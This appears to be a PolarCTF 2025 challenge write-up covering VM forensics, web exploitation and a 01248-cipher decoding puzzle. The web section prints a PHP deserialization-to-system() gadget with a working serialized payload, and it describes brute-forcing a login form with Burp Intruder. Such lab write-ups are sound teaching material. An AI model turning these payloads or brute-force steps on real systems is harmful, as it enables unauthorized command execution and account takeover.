PolarCTF 2025 Summer Challenge Writeup: Misc, Web, and Crypto Puzzles
Miscellaneous Challenges
Initial Access via Social Media
The first step involves following the official public account and sending a specific keyword to receive a token.
Virtual Machine Forensics
Import the provided .ovf file into virtualization software. Once the system boots, launch the Edge browser and examine its history. A previously unseen web application called Tinode appears, indicating the communication platform used. Its IP address is also visible in the history records.
- First flag component: Tinode
- Fourth flag component: 192.168.192.129
Next, inspect the files on the host. Configure File Explorer to show hidden files and file extensions. A directory named chat-master sits on the desktop, likely containing the source code for the chat platform. Within the Documents folder, a subdirectory called program contains a suspicious executable named NewWorld.exe.
- Second flag component: NewWorld.exe
Reviewing the file main.py reveals a self-desrcibed trojan script. The comment indicates it is a Python-based malicious tool.
- Third flag component: python
Further commentary within the script mentions processing cmd.exe, confirming this system binary was the target of encryption or manipulation.
- Fifth flag component: cmd.exe
Web Exploitation
Deserialization Chain
Source code analysis shows a vulnerable class A with a destructor that passes a user-controlled property to system() if set.
<?php
class A {
public $cmd;
function __destruct() {
if (isset($this->cmd)) {
system($this->cmd);
}
}
}
if (isset($_GET['data'])) {
$data = $_GET['data'];
@unserialize($data);
} else {
highlight_file(__FILE__);
}
?>
Construct a serialized payload to run a command, then URL-encode the result and pass it via the data parameter.
<?php
class A {
public $cmd = 'cat /flag';
}
echo urlencode(serialize(new A()));
?>
Execute this in any PHP sandbox and assign the output to the data parameter to retrieve the flag.
The Gate of Fate
Examining page source reveals a Base64 comment: 5pyJ5pe25YCZ77yM6aqM6K+B56CB5piv5ZCm5aW95L2/5LiN6YeN6KaB. Decoding it yields a hint that the verification code is not important, so a universal code 0000 bypasses it.
Run a directory scanner such as dirsearch against the target. Discover a password.txt dictionary file in the web root. Download its contents and use Burp Suite Intruder to brute-force the "Alpha" line, then repeat with a separate wordlist for the "Beta" line to retrieve the flag.
Command Execution Bypass
Initial testing shows that many characters and commands are blocked by a filter. Checking environment variables reveals a fake flag designed to mislead.
Using dirsearch uncovers a hidden endpoint. It hints at replacing characters in a path targeting flag.txt. The endpoint requests a parameter named XOR_KEY, with the challenge name "Polar" serving as the value. Return to the command execution interface, supply the parameter with the correct value, and obtain the real flag.
Cryptography
Cloud Shadow Cipher
This puzzle uses the "Cloud Shadow" cipher, also known as 01248 encoding. Digits 1, 2, 4, 8 are summed to represent values 0-9 (where 0 is represented by 28 via 2+8), and sums map to letters (1=A, 26=Z). The digit 0 acts as a delimiter.
raw = "5212081052120120885309853"
parts = raw.split('0')
result_chars = []
for segment in parts:
segment_sum = 0
for ch in segment:
segment_sum += int(ch)
result_chars.append(chr(segment_sum + 64))
plaintext = ''.join(result_chars)
print(plaintext)
Take the resulting decoded string, compute its MD5 hash, and wrap it in flag{} format.
